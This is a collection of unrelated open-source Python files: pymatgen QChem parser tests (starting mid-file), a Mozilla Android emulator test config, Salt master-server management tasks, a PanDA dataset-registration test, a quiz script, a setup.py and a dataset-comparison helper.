self.assertArrayAlmostEqual(qcout.data[0]["HOMO/LUMOs"],
[[-17.741823053011334, 5.224585929721129],
[-17.741823053011334, 5.224585929721129]], 4)
filename = os.path.join(test_dir, "crowd_gradient_number.qcout")
qcout = QcOutput(filename)
self.assertArrayAlmostEqual(
qcout.data[0]["HOMO/LUMOs"], [[-5.741602245683116,
-4.544301303455358],
[-4.9796834642654515,
-4.2993988379996795], [-4.761992383860404, -3.8095939070883236]], 4)
def test_bsse(self):
filename = os.path.join(test_dir, "bsse.qcout")
qcout = QcOutput(filename)
self.assertAlmostEqual(qcout.data[0]["bsse"], -0.164210762949, 5)
self.assertEqual(qcout.data[0]["jobtype"], "bsse")
def test_hirshfeld_charge(self):
filename = os.path.join(test_dir, "hirshfeld_population.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["charges"]["hirshfeld"],
[-0.286309, 0.143134, 0.143176])
self.assertFalse(qcout.data[0]["has_error"])
def test_ghost_atoms(self):
filename = os.path.join(test_dir, "ghost_atoms.qcout")
qcout = QcOutput(filename)
elements = [a.specie.symbol for a in qcout.data[-1]["molecules"][-1].sites]
self.assertEqual(elements, ['O', 'H', 'H', 'C', 'H', 'H', 'H', 'H'])
filename = os.path.join(test_dir, "MgBF4_b_overalpped.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["input"].ghost_atoms, [0])
def test_final_energy(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.final_energy, -20180.15180854295)
def test_final_structure(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
ans = '''Full Formula (H4 C5 S1 O2)
Reduced Formula: H4C5SO2
Charge = -1, Spin Mult = 2
Sites (12)
0 C 0.194695 -0.158362 -0.001887
1 C -0.535373 -1.381241 -0.001073
2 C -1.927071 -1.199274 -0.000052
3 C -2.332651 0.131916 0.000329
4 S -0.942111 1.224916 -0.001267
5 H -0.038260 -2.345185 -0.001256
6 H -2.636299 -2.025939 0.000620
7 H -3.339756 0.529895 0.001288
8 C 1.579982 0.071245 -0.002733
9 O 2.196383 1.165675 -0.000178
10 O 2.352341 -1.114671 0.001634
11 H 3.261096 -0.769470 0.003158'''
self.assertEqual(qcout.final_structure.__str__(), ans)
def test_time_nan_values(self):
filename = os.path.join(test_dir, "time_nan_values.qcout")
qcout = QcOutput(filename)
self.assertFalse(qcout.data[0]["has_error"])
def test_pcm_solvent_deprecated(self):
filename = os.path.join(test_dir, "pcm_solvent_deprecated.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[-1]["has_error"])
ans = ['pcm_solvent deprecated',
'Molecular charge is not found',
'No input text',
'Bad SCF convergence']
self.assertEqual(qcout.data[-1]["errors"], ans)
def test_qc43_batch_job(self):
filename = os.path.join(test_dir, "qchem43_batch_job.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 2)
self.assertEqual(len(qcout.data[0]["scf_iteration_energies"][0]), 22)
self.assertTrue("pcm_solvent deprecated" in qcout.data[1]["errors"])
def test_output_file_wierd_encoding(self):
filename = os.path.join(test_dir, "ferrocenium_1pos.qcout")
qcout = QcOutput(filename)
self.assertFalse(qcout.data[1]["has_error"])
self.assertEqual(qcout.data[1]["frequencies"][0]["frequency"], -157.11)
def test_homo_lumo_nan_values(self):
filename = os.path.join(test_dir, "homo_lumo_nan_values.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]["has_error"])
def test_ordinal_not_in_range(self):
filename = os.path.join(test_dir, "ordinal_not_in_range.qcout.gz")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 1)
def test_aux_mpi_time_in_the_end_of_job(self):
filename = os.path.join(test_dir, "aux_mpi_time_mol.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 2)
def test_opt(self):
filename = os.path.join(test_dir, "pt_dft_180.0.qcout")
qcout = QcOutput(filename)
qcin = qcout.data[-1]['input']
qcin_ans = '''$molecule
0 1
S 1.82267924 -1.19997629 0.28714109
C 3.20006180 -0.17260711 0.06528466
C 2.82980603 1.10216298 -0.25610036
C 1.41909100 1.26345446 -0.34254814
C 0.71738150 0.10901545 -0.08456145
H 0.93627498 2.19419272 -0.61095402
C -0.71741859 -0.10899254 -0.08455524
S -1.82328469 1.20374179 -0.44105740
C -1.41912820 -1.26343144 0.17343142
C -3.19922829 0.16690023 -0.25767458
C -2.82941826 -1.10493701 0.07562280
H -3.53750269 -1.90709774 0.23645949
H 4.19429620 -0.57452886 0.18632814
H 3.53860725 1.89960515 -0.43610218
H -4.19239866 0.56181917 -0.40716131
H -0.93481970 -2.20399421 0.40193462
$end
$rem
jobtype = opt
exchange = b3lyp
basis = 6-31++g**
max_scf_cycles = 75
mem_static = 100
mem_total = 1500
$end
$opt
CONSTRAINT
tors 4 5 7 9 180.0
ENDCONSTRAINT
$end
'''
self.assertEqual(str(qcin), qcin_ans)
constraint = qcin.params['opt']
constraint_ans = [['tors', 4, 5, 7, 9, 180.0]]
self.assertEqual(constraint, constraint_ans)
if __name__ == "__main__":
unittest.main()
| aykol/pymatgen | pymatgen/io/tests/test_qchem.py | Python | mit | 81,842 |
import os
config = {
"buildbot_json_path": "buildprops.json",
"host_utils_url": "http://talos-remote.pvt.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip",
"robocop_package_name": "org.mozilla.roboexample.test",
"device_ip": "127.0.0.1",
"default_sut_port1": "20701",
"default_sut_port2": "20700", # does not prompt for commands
"tooltool_manifest_path": "testing/config/tooltool-manifests/androidx86/releng.manifest",
"tooltool_cache": "/builds/tooltool_cache",
"tooltool_servers": ["http://runtime-binaries.pvt.build.mozilla.org/tooltool/"],
".avds_dir": "/home/cltbld/.android",
"emulator_process_name": "emulator64-x86",
"exes": {
'adb': '/tools/android-sdk18/platform-tools/adb',
'python': '/tools/buildbot/bin/python',
'virtualenv': ['/tools/buildbot/bin/python', '/tools/misc-python/virtualenv.py'],
'tooltool.py': "/tools/tooltool.py",
},
"env": {
"DISPLAY": ":0.0",
"PATH": "%(PATH)s:/tools/android-sdk18/tools:/tools/android-sdk18/platform-tools",
},
"default_actions": [
'clobber',
'read-buildbot-config',
'setup-avds',
'start-emulators',
'download-and-extract',
'create-virtualenv',
'install',
'run-tests',
'stop-emulators',
],
"emulators": [
{
"name": "test-1",
"device_id": "emulator-5554",
"http_port": "8854", # starting http port to use for the mochitest server
"ssl_port": "4454", # starting ssl port to use for the server
"emulator_port": 5554,
"sut_port1": 20701,
"sut_port2": 20700
},
{
"name": "test-2",
"device_id": "emulator-5556",
"http_port": "8856", # starting http port to use for the mochitest server
"ssl_port": "4456", # starting ssl port to use for the server
"emulator_port": 5556,
"sut_port1": 20703,
"sut_port2": 20702
},
{
"name": "test-3",
"device_id": "emulator-5558",
"http_port": "8858", # starting http port to use for the mochitest server
"ssl_port": "4458", # starting ssl port to use for the server
"emulator_port": 5558,
"sut_port1": 20705,
"sut_port2": 20704
},
{
"name": "test-4",
"device_id": "emulator-5560",
"http_port": "8860", # starting http port to use for the mochitest server
"ssl_port": "4460", # starting ssl port to use for the server
"emulator_port": 5560,
"sut_port1": 20707,
"sut_port2": 20706
}
],
"test_suite_definitions": {
"jsreftest": {
"category": "reftest",
"extra_args": ["../jsreftest/tests/jstests.list",
"--extra-profile-file=jsreftest/tests/user.js"]
},
"mochitest-1": {
"category": "mochitest",
"extra_args": ["--total-chunks=2", "--this-chunk=1", "--run-only-tests=androidx86.json"],
},
"mochitest-2": {
"category": "mochitest",
"extra_args": ["--total-chunks=2", "--this-chunk=2", "--run-only-tests=androidx86.json"],
},
"mochitest-gl": {
"category": "mochitest",
"extra_args": ["--test-manifest=gl.json"],
},
"reftest-1": {
"category": "reftest",
"extra_args": ["--total-chunks=3", "--this-chunk=1",
"tests/layout/reftests/reftest.list"]
},
"reftest-2": {
"category": "reftest",
"extra_args": ["--total-chunks=3", "--this-chunk=2",
"tests/layout/reftests/reftest.list"]
},
"reftest-3": {
"category": "reftest",
"extra_args": ["--total-chunks=3", "--this-chunk=3",
"tests/layout/reftests/reftest.list"]
},
"crashtest": {
"category": "reftest",
"extra_args": ["tests/testing/crashtest/crashtests.list"]
},
"xpcshell": {
"category": "xpcshell",
# XXX --manifest is superseded by testing/config/mozharness/android_x86_config.py.
# Remove when Gecko 35 no longer in tbpl.
"extra_args": ["--manifest=tests/xpcshell_android.ini"]
},
"robocop-1": {
"category": "mochitest",
"extra_args": ["--total-chunks=3", "--this-chunk=1", "--robocop-path=../..",
"--robocop-ids=fennec_ids.txt", "--robocop=robocop.ini"],
},
"robocop-2": {
"category": "mochitest",
"extra_args": ["--total-chunks=3", "--this-chunk=2", "--robocop-path=../..",
"--robocop-ids=fennec_ids.txt", "--robocop=robocop.ini"],
},
"robocop-3": {
"category": "mochitest",
"extra_args": ["--total-chunks=3", "--this-chunk=3", "--robocop-path=../..",
"--robocop-ids=fennec_ids.txt", "--robocop=robocop.ini"],
},
}, # end of "test_definitions"
# test harness options are located in the gecko tree
"in_tree_config": "config/mozharness/android_x86_config.py",
"download_minidump_stackwalk": True,
"default_blob_upload_servers": [
"https://blobupload.elasticbeanstalk.com",
],
"blob_uploader_auth_file" : os.path.join(os.getcwd(), "oauth.txt"),
}
| kartikgupta0909/build-mozharness | configs/android/androidx86.py | Python | mpl-2.0 | 5,532 |
"""Tasks we perform on the master server.
See `askmaster.py` for tasks that are run on minions."""
import os, time
import cfn, buildvars, utils
from buildercore.command import remote_sudo, local
from buildercore import core, bootstrap, config, keypair, project, cfngen, context_handler
from buildercore.utils import lmap, exsubdict, mkidx
from decorators import echo_output, requires_aws_stack
from kids.cache import cache as cached
import logging
LOG = logging.getLogger(__name__)
def update(master_stackname=None):
"same as `cfn.update` but also removes any orphaned minion keys"
master_stackname = master_stackname or core.find_master(utils.find_region())
bootstrap.update_stack(master_stackname, service_list=[
'ec2' # master-server should be a self-contained EC2 instance
])
bootstrap.remove_all_orphaned_keys(master_stackname)
#
#
#
def write_missing_keypairs_to_s3():
"uploads any missing ec2 keys to S3 if they're present locally"
remote_keys = keypair.all_in_s3()
local_paths = keypair.all_locally()
local_keys = lmap(os.path.basename, local_paths)
to_upload = set(local_keys).difference(set(remote_keys))
print('remote:', remote_keys)
print('local:', local_keys)
print('to upload:', to_upload)
def write(key):
stackname = os.path.splitext(key)[0]
keypair.write_keypair_to_s3(stackname)
lmap(write, to_upload)
@requires_aws_stack
@echo_output
def download_keypair(stackname):
try:
return keypair.download_from_s3(stackname)
except EnvironmentError as err:
LOG.info(err)
#
#
#
@echo_output
@cached
def server_access():
"""returns True if this builder instance has access to the master server.
access may be available through presence of the master-server's bootstrap user's
identity file OR current user is in master server's allowed_keys list"""
stackname = core.find_master(core.find_region())
public_ip = core.stack_data(stackname, ensure_single_instance=True)[0]['PublicIpAddress']
result = local('ssh -o "StrictHostKeyChecking no" %s@%s "exit"' % (config.BOOTSTRAP_USER, public_ip))
return result['succeeded']
@cached
def _cached_master_ip(master_stackname):
"provides a small time saving when remastering many minions"
return core.stack_data(master_stackname)[0]['PrivateIpAddress']
@requires_aws_stack
def update_salt(stackname):
"updates the Salt version installed on the instances for the given stack"
# start instance if it is stopped
# acquire a lock from Alfred (if possible) so instance isn't shutdown while being updated
cfn._check_want_to_be_running(stackname, autostart=True)
context = context_handler.load_context(stackname)
if not context.get('ec2'):
LOG.info("no ec2 context. skipping stack: %s", stackname)
return
LOG.info("upgrading stack's salt minion")
pdata = core.project_data_for_stackname(stackname)
context['project']['salt'] = pdata['salt']
LOG.info("updating stack's context")
context_handler.write_context(stackname, context)
LOG.info("updating stack's nodes (sequentially)")
bootstrap.update_ec2_stack(stackname, context, concurrency='serial')
return True
def update_salt_master(region=None):
"convenience. update the version of Salt installed on the master-server."
region = region or utils.find_region()
current_master_stackname = core.find_master(region)
return update_salt(current_master_stackname)
@requires_aws_stack
def remaster(stackname, new_master_stackname="master-server--2018-04-09-2"):
"tell minion who their new master is. deletes any existing master key on minion"
# start instance if it is stopped
# acquire a lock from Alfred (if possible) so instance isn't shutdown while being updated
cfn._check_want_to_be_running(stackname, autostart=True)
master_ip = _cached_master_ip(new_master_stackname)
LOG.info('re-mastering %r to %r', stackname, master_ip)
context = context_handler.load_context(stackname)
if not context.get('ec2'):
LOG.info("no ec2 context, skipping %s", stackname)
return
if context['ec2'].get('master_ip') == master_ip:
LOG.info("already remastered: %s", stackname)
return
pdata = core.project_data_for_stackname(stackname)
LOG.info("setting new master address")
cfngen.set_master_address(pdata, context, master_ip) # mutates context
LOG.info("updating context")
context_handler.write_context(stackname, context)
LOG.info("updating buildvars")
buildvars.refresh(stackname, context)
# remove knowledge of old master by destroying the minion's master pubkey
def workerfn():
remote_sudo("rm -f /etc/salt/pki/minion/minion_master.pub")
LOG.info("removing old master key from minion")
core.stack_all_ec2_nodes(stackname, workerfn, username=config.BOOTSTRAP_USER)
LOG.info("updating nodes")
# todo: how to pass in --dry-run to highstate.sh ?
bootstrap.update_ec2_stack(stackname, context, concurrency='serial')
return True
def remaster_all(*pname_list):
"calls `remaster` on *all* projects or just a subset of projects"
# there should only be one master-server instance at a time.
# multiple masters is bad news. assumptions break and it gets complicated quickly.
new_master_stackname = "master-server--2018-04-09-2"
LOG.info('new master is: %s', new_master_stackname)
ec2stacks = project.ec2_projects()
ignore = [
'master-server',
]
ec2stacks = exsubdict(ec2stacks, ignore)
# we can optionally pass in a list of projects to target
# this allows us to partition up the projects and have many of these
# remastering efforts happening concurrently
if pname_list:
more_ignore = [p for p in ec2stacks if p not in pname_list]
ec2stacks = exsubdict(ec2stacks, more_ignore)
pname_list = sorted(ec2stacks.keys()) # lets do this alphabetically
# TODO: skip any stacks without ec2 instances
# only update ec2 instances in the same region as the new master
region = utils.find_region(new_master_stackname)
active_stacks = core.active_stack_names(region)
stack_idx = mkidx(lambda v: core.parse_stackname(v)[0], active_stacks)
def sortbyenv(n):
adhoc = 0 # do these first
order = {
'continuumtest': 1,
'ci': 2,
'end2end': 3,
'prod': 4, # update prod last
}
pname, iid = core.parse_stackname(n)
return order.get(iid, adhoc)
remastered_list = open('remastered.txt', 'r').read().splitlines() if os.path.exists('remastered.txt') else []
for pname in pname_list:
# when would this ever be the case?
# `core.active_stack_names` doesn't discriminate against any list of projects
# it returns *all* steady stack names.
if pname not in stack_idx:
continue
project_stack_list = sorted(stack_idx[pname], key=sortbyenv)
LOG.info("%r instances: %s" % (pname, ", ".join(project_stack_list)))
try:
for stackname in project_stack_list:
try:
if stackname in remastered_list:
LOG.info("already updated, skipping stack: %s", stackname)
continue
LOG.info("*" * 80)
LOG.info("updating: %s" % stackname)
utils.get_input('continue? ctrl-c to quit')
if not remaster(stackname, new_master_stackname):
LOG.warning("failed to remaster %s, stopping further remasters to project %r", stackname, pname)
break
# print a reminder of which stack was just updated
print("\n(%s)\n" % stackname)
open('remastered.txt', 'a').write("%s\n" % stackname)
except KeyboardInterrupt:
LOG.warning("ctrl-c, skipping stack: %s", stackname)
LOG.info("ctrl-c again to exit process entirely")
time.sleep(2)
except BaseException:
LOG.exception("unhandled exception updating stack: %s", stackname)
except KeyboardInterrupt:
LOG.warning("quitting")
break
LOG.info("wrote 'remastered.txt'")
| elifesciences/builder | src/master.py | Python | mit | 8,407 |
import commands
from dataservice.DDM import ddm
#print ddm.DQ2ProductionClient.generateUUID()
#print ddm.DQ2.getFilesFromCatalog('aho.xml')
#print ddm.DQ2ProductionClient.dq2_makeblocks('input.data')
ids=['pandatest.000003.dd.input._00047.junk','09801b0a-9fd0-4237-8caf-a37932c26e39',
'pandatest.000003.dd.input._00050.junk','6dd3d367-4aa3-4e1a-9ac3-9ad14b7311f4',
'pandatest.000003.dd.input._00037.junk','817c2c92-467b-4a1b-9482-f2ec8468cf2e',
'pandatest.000003.dd.input._00021.junk','7720527f-817e-40c7-9e29-ce237f59edfa',
'pandatest.000003.dd.input._00023.junk','5f1f9982-85a3-4d1a-9ee9-f1de22c02544',
'pandatest.000003.dd.input._00042.junk','610cc91a-c731-4bce-ac7a-ff5133e7d18b',
'pandatest.000003.dd.input._00027.junk','bd987478-3c59-4551-b12b-2853bac25613',
'pandatest.000003.dd.input._00032.junk','9d0424f3-7552-4282-92f2-dfe74e9a6c12',
'pandatest.000003.dd.input._00009.junk','dce33d4a-4569-49ee-95c5-b619b161c777',
'pandatest.000003.dd.input._00036.junk','2fc9836b-82d6-41b0-b966-a5c37662172d',
'pandatest.000003.dd.input._00031.junk','65b957e0-5ecc-44bb-a1f9-cccb61ca2d16',
'pandatest.000003.dd.input._00025.junk','be29fe82-17e2-4122-b4c8-f49a0b76c81f',
'pandatest.000003.dd.input._00029.junk','afa4322f-409b-4327-9169-229d8d48ad5a',
'pandatest.000003.dd.input._00013.junk','cf236d3b-45fd-4b58-bdfb-59abc983c886',
'pandatest.000003.dd.input._00020.junk','b02f98da-0138-4b58-89ba-a88f37214a89',
'pandatest.000003.dd.input._00001.junk','12ab5bb9-944e-4e75-bb90-b64c462d4cd8',
'pandatest.000003.dd.input._00001.junk','12ab5bb9-944e-4e75-bb90-b64c462d4cd8',
'pandatest.000003.dd.input._00006.junk','c0a422ad-e9f1-44bb-9539-cfef7e739da2',
'pandatest.000003.dd.input._00034.junk','da670db3-3638-4f06-b650-a9315eb2bd63',
'pandatest.000003.dd.input._00046.junk','2fcef270-2e41-472d-83c0-53749b401b74',
'pandatest.000003.dd.input._00012.junk','5e212fa1-201f-494d-a2b2-420b229b08fc',
'pandatest.000003.dd.input._00044.junk','87c8ebcc-a637-4204-b77b-8219e68b98d7',
'pandatest.000003.dd.input._00030.junk','87ad811f-7d39-43d9-8a13-e117079bb208',
'pandatest.000003.dd.input._00022.junk','6b902506-1ee1-46b1-a105-1521a8c0dbca',
'pandatest.000003.dd.input._00017.junk','2bbed213-943c-41be-b9d7-7d86a309b0b2',
'pandatest.000003.dd.input._00049.junk','8366e269-f9ae-4b9c-bd98-df4027c992c7',
'pandatest.000003.dd.input._00015.junk','f3c5f37c-b4c2-4933-9633-467ba3a7c364',
'pandatest.000003.dd.input._00004.junk','35d66be2-9d21-44a3-96f7-903a7abf4a87',
'pandatest.000003.dd.input._00010.junk','2279ea3e-ebbb-4b19-9a69-9868f0cce694',
'pandatest.000003.dd.input._00040.junk','a847dbbb-4f98-4b5b-b353-e29e3e3b3fd5',
'pandatest.000003.dd.input._00007.junk','abfef002-62ca-4d84-9813-6329764e38bd',
'pandatest.000003.dd.input._00048.junk','52854023-67d8-4a0f-99ac-bb1f0bd1dc98',
'pandatest.000003.dd.input._00016.junk','bddf7441-6ac9-4087-bafe-32e47448cdc1',
'pandatest.000003.dd.input._00041.junk','c76999ba-4cdf-49e9-bfa5-ff3525fbf1ab',
'pandatest.000003.dd.input._00003.junk','4865119e-367f-4dd8-bdff-505bd878dfde',
'pandatest.000003.dd.input._00019.junk','b9fce1fd-8d4c-4fc4-932f-12b13263ca0c',
'pandatest.000003.dd.input._00011.junk','f93a4e08-fd4f-45fc-b324-91ff59555b1c',
'pandatest.000003.dd.input._00018.junk','e4894561-9589-40d8-871b-b57d70564384',
'pandatest.000003.dd.input._00002.junk','58934980-5ab3-4a66-b3da-55f86d4b54bd',
'pandatest.000003.dd.input._00005.junk','5993fe60-bc8c-4fd8-aac1-dfd55700c9c3',
'pandatest.000003.dd.input._00028.junk','6c19e1fc-ee8c-4bae-bd4c-c9e5c73aca27',
'pandatest.000003.dd.input._00033.junk','98f79ba1-1793-4253-aac7-bdf90a51d1ee',
'pandatest.000003.dd.input._00039.junk','33660dd5-7cef-422a-a7fc-6c24cb10deb1',
'pandatest.000003.dd.input._00014.junk','5c0e9ed8-05a6-41c4-8c07-39b2be33ebc1',
'pandatest.000003.dd.input._00008.junk','b0c184d1-5f5e-45a6-9cc8-8b0f20a85463',
'pandatest.000003.dd.input._00038.junk','b9171997-4d2b-4075-b154-579ebe9438fa',
'pandatest.000003.dd.input._00026.junk','89e5bdf1-15de-44ae-a388-06c1e7d7e2fc',
'pandatest.000003.dd.input._00024.junk','c77b77a2-e6d1-4360-8751-19d9fb77e1f1',
'pandatest.000003.dd.input._00043.junk','cc6ac2a1-4616-4551-80a7-d96f79252b64',
'pandatest.000003.dd.input._00045.junk','ddbed17a-6d65-4e8d-890a-21e1eaa3e9d6',
'pandatest.000003.dd.input._00035.junk','8ed1875a-eb90-4906-8fc4-0449d300ddfe'
]
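# `ids` alternates logical file names with their GUIDs; each loop iteration below
# consumes one (LFN, GUID) pair via ids[i*2:i*2+2] when registering a dataset.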
for i in range(1):
datasetName='testDQ.%s' % commands.getoutput('/usr/bin/uuidgen')
print datasetName
#['pandatest.000003.dd.input._00004.junk','35d66be2-9d21-44a3-96f7-903a7abf4a87']
#'pandatest.000003.dd.input._00028.junk','6c19e1fc-ee8c-4bae-bd4c-c9e5c73aca27',
# 'pandatest.000003.dd.input._00033.junk','98f79ba1-1793-4253-aac7-bdf90a51d1ee']
print (['registerNewDataset','-c',datasetName]+ids[i*2:i*2+2])
ddm.DQ2.main(['registerNewDataset','-c',datasetName]+ids[i*2:i*2+2])
'''
status,out = ddm.RepositoryClient.main(['queryDatasetByName',datasetName])
exec "vuids = %s" % out.split('\n')[0]
if vuids.has_key(datasetName):
vuid = vuids[datasetName]
print vuid
status,out = ddm.RepositoryClient.main(['resolveVUID',vuid])
status,out = ddm.DQ2.getFilesFromCatalog('baka.xml')
exec "rets = %s" % out.split('\n')[0]
print rets[0]
exec "ids = %s" % out
print ddm.DQ2.main(['addFilesToDataset',datasetName]+ids)
status,out = ddm.DQ2.main(['listFilesInDataset',datasetName])
print out
'''
print (['registerDatasetLocations','-c',datasetName,'http://dms02.usatlas.bnl.gov/sites/bnl/lrc'])
ddm.DQ2.main(['registerDatasetLocations','-c',datasetName,
'http://dms02.usatlas.bnl.gov/sites/bnl/lrc'])
print (['registerDatasetSubscription',datasetName,'http://doe-dhcp241.bu.edu:8000/dq2/'])
ddm.DQ2.main(['registerDatasetSubscription',datasetName,'http://doe-dhcp241.bu.edu:8000/dq2/'])
#print ddm.DQ2.main(['eraseDataset',datasetName])
#print ddm.DQ2.main(['eraseDataset',datasetName])
#print ddm.DQ2ProductionClient.dq2_create_dataset(datasetName)
#status,out = ddm.DQ2ProductionClient.dq2_assign_destination(datasetName,'BNL_SE')
#print out
#print ddm.DQ2.main(['eraseDataset',datasetName])
#status,out = ddm.DQ2.main(['listFilesInDataset','panda.destDB.11aed982-8079-4db9-964c-37a284b8597a'])
#print out
ddm.DQ2_iter.listFileReplicasBySites('mc11_7TeV.151900.madgraph_SM_SG_SS_direct_1200_600_395.merge.AOD.e1095_a131_s1353_a145_r2993_tid723983_00',
0,['SARA-MATRIX_DATADISK'],
0,300)
| RRCKI/panda-server | pandaserver/test/testDQ.py | Python | apache-2.0 | 6,730 |
# -*- coding: utf-8 -*-
"""
xkbgroup
~~~~~~~~
Use this library to change the keyboard layout through the XKB extension
(subsystem) of the X server system.
:copyright: (c) 2016 by Nguyen Duc My.
:license: MIT, see LICENSE for more details.
"""
from .core import XKeyboard, X11Error
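# Minimal usage sketch (illustrative only; assumes a running X session, and the
# `group_num` attribute name is an assumption rather than taken from this file):
#
#   from xkbgroup import XKeyboard
#   xkb = XKeyboard()
#   print(xkb.group_num)   # index of the currently active layout group
#   xkb.group_num = 1      # switch to the second configured layout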
| hcpl/xkbgroup | xkbgroup/__init__.py | Python | mit | 305 |
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 10 11:29:03 2016
@author: Bram
"""
import pandas as pan
import codecs
import numpy as np
import os
#Find computer user
user=os.getlogin()
#Fine last session version
fileList=os.listdir("C:/Users/%s/Desktop/QuestionHistCrit/saves" %user)
fileList=sorted(fileList)
lastFile=fileList[-1]
numberFile=[int(s) for s in lastFile.split("_") if s.isdigit()]
numberFile=numberFile[0]
#Open lijst met foute stellingen
f = codecs.open ('C:/Users/%s/Desktop/QuestionHistCrit/vragenlijstFout.txt' %user,'r',"utf-8")
#Omzetting in array
q= pan.DataFrame(columns=['Question','Answer','explanationifFalse','AnswerShort'])
#line1=f.readline()
#f.readline()
#f.readline()
#line2=f.readline()
#f.readline()
#line3=f.readline()
#f.readline()
#f.readline()
#f.readline()
#data={'Question':[line1],'Answer':[line2],'explanationifFalse':[line3]}
#temp= pan.DataFrame(data,columns=['Question','Answer','explanationifFalse'])
#q=q.append(temp)
for x in range(0, 62):
line1=f.readline()
f.readline()
f.readline()
line2=f.readline()
f.readline()
line3=f.readline()
f.readline()
f.readline()
f.readline()
data={'Question':[line1],'Answer':[line2],'explanationifFalse':[line3],'AnswerShort':['f']}
temp= pan.DataFrame(data,columns=['Question','Answer','explanationifFalse','AnswerShort'])
q=q.append(temp)
#Open the list of correct statements in UTF-8 encoding
f = codecs.open ('C:/Users/%s/Desktop/QuestionHistCrit/vragenlijstJuist.txt' %user,'r',"utf-8")
for x in range(0, 93):
line1=f.readline()
f.readline()
f.readline()
data={'Question':[line1],'Answer':['N/A'],'explanationifFalse':['N/A'],'AnswerShort':['t']}
temp= pan.DataFrame(data,columns=['Question','Answer','explanationifFalse','AnswerShort'])
q=q.append(temp)
f.close()
#Re-index from dataframe
q.index=range(len(q))
#Initialising Main loop
counter=1;
score=0;
wrongList=pan.DataFrame(columns=['Question','Answer','explanationifFalse','AnswerShort']);
#Main loop
mode=input("Vorige sessie laden? (y/n): ")
N=int(input("Hoeveel vragen ?: "))
if mode=="y":
q=pan.read_csv("C:/Users/%s/Desktop/QuestionHistCrit/saves/session_%d_.csv" %(user,numberFile) ,encoding="utf-8")
del q["Unnamed: 0"]
while(counter<=N):
randNum=np.random.randint(0,len(q.index))
print(q.iloc[randNum,0])
ans= input(" Answer (t/f): ")
if not (ans == 'f' or ans == 't'):
while not (ans =='f' or ans =='t'):
ans= input(" Answer (t/f): ")
if ans==q.iloc[randNum,3]:
score+=1;
q=q.drop(randNum)
q.index=range(len(q)) #reindex question
print("Right! :D")
else:
wrongList=wrongList.append(q.iloc[randNum,0:4])
print("")
print("")
print("Wrong :(")
print(q.iloc[randNum,1])
print(q.iloc[randNum,2])
input("Press Enter to continue...")
counter +=1;
print("")
print("")
print("Je score is %d / %d" % (score,N) )
#Merge all incorrect ones back in with the ones not yet asked
numberFile +=1
q.to_csv("C:/Users/%s/Desktop/QuestionHistCrit/saves/session_%d_.csv" %(user,numberFile),encoding="utf-8")
| Beramos/QuestionHistCrit | Questioner.py | Python | cc0-1.0 | 3,231 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ===============================================================
#
# Filename: setup.py
#
# Author: Oxnz
# Email: yunxinyi@gmail.com
# Created: 2015-12-28 09:46:31 CST
# Last-update: 2015-12-28 09:46:31 CST
# Description: ANCHOR
#
# Version: 0.0.1
# Revision: [None]
# Revision history: [None]
# Date Author Remarks: [None]
#
# License:
# Copyright (c) 2015 Oxnz
#
# Distributed under terms of the [LICENSE] license.
# [license]
#
# ===============================================================
#
from distutils.core import setup
from distutils.extension import Extension
__version__ = '0.1'
FastInt = Extension(
'FastInt',
sources = ['FastInt/FastInt.c'],
extra_compile_args = ['-O3', '-std=c99', '-Wall'],
extra_link_args = [],
)
setup(
name = 'FastInt',
version = __version__,
ext_modules = [FastInt],
)
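# Typical local build of the extension (standard distutils invocation):
#   python setup.py build_ext --inplace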
| oxnz/work-stuff | logparse/setup.py | Python | mit | 935 |
from __future__ import print_function
import numpy, plots, math, operator, copy
COPY = copy.deepcopy
# define a post-processing operation that always remembers the last data set and
# computes statistical differences between that one and the next data set.
# After that, the new data set becomes the last one.
# Purpose: to verify that two chunks of data extraced from measurement sets that *should*
# be equal, are, in fact, equal.
# If a new type of data set is detected (new plot type) the last data set is erased,
# this data set becomes the stored one, and no output is generated
last_dataset = None
tolerance = 1e-7
def plotar2unidict(plotar):
rv = plots.Dict()
rv.plotType = plotar.plotType
# loop over all plots and datasets-within-plot
for k in plotar.keys():
for d in plotar[k].keys():
# get the full data set label - we have access to all the data set's properties (FQ, SB, POL etc)
n = plots.join_label(k, d)
# and make a copy of the dataset
rv[n] = COPY( plotar[k][d] )
return rv
# this is the function to pass to `postprocess ...`
def compare_data(plotar, ms2mappings):
global last_dataset
# Whatever we need to do - this can be done unconditionally
new_dataset = plotar2unidict( plotar )
error = ""
# Check if we need to do anything at all
if last_dataset is not None and last_dataset.plotType == new_dataset.plotType:
# OK check all common keys
old_keys = set(last_dataset.keys())
new_keys = set(new_dataset.keys())
# if the sets are not equal, the data will also not compare equal!
if old_keys == new_keys:
# inspect x and y separately, add up all the diffs
dx, dy = 0, 0
for k in old_keys:
ods = last_dataset[ k ]
nds = new_dataset[ k ]
dx = numpy.add(numpy.abs( ods.xval - nds.xval ), dx)
dy = numpy.add(numpy.abs( ods.yval - nds.yval ), dy)
if numpy.any( dx>abs(tolerance) ):
print(">>> compare_data: total diffs in x exceed tolerance")
print(" tolerance=", tolerance)
print(" accum. dx=", dx)
error += "Datasets mismatch in X according to tolerance. "
if numpy.any( dy>abs(tolerance) ):
print(">>> compare_data: total diffs in y exceed tolerance")
print(" tolerance=", tolerance)
print(" accum. dy=", dy)
error = "Datasets mismatch in Y according to tolerance. "
else:
print(">>> compare_data: The datasets to compare have different data content?!")
common = old_keys & new_keys
only_o = old_keys - common
only_n = new_keys - common
print(" Common keys:", len(common))
print(" Uniq in Old:", len(only_o))
print(" Uniq in New:", len(only_n))
error += "Datasets mismatch in content. "
#with open('/tmp/oldkeys.txt', 'w') as f:
# list( map(lambda s: f.write(str(s) + '\n'), sorted(only_o)) )
#with open('/tmp/newkeys.txt', 'w') as f:
# list( map(lambda s: f.write(str(s) + '\n'), sorted(only_n)) )
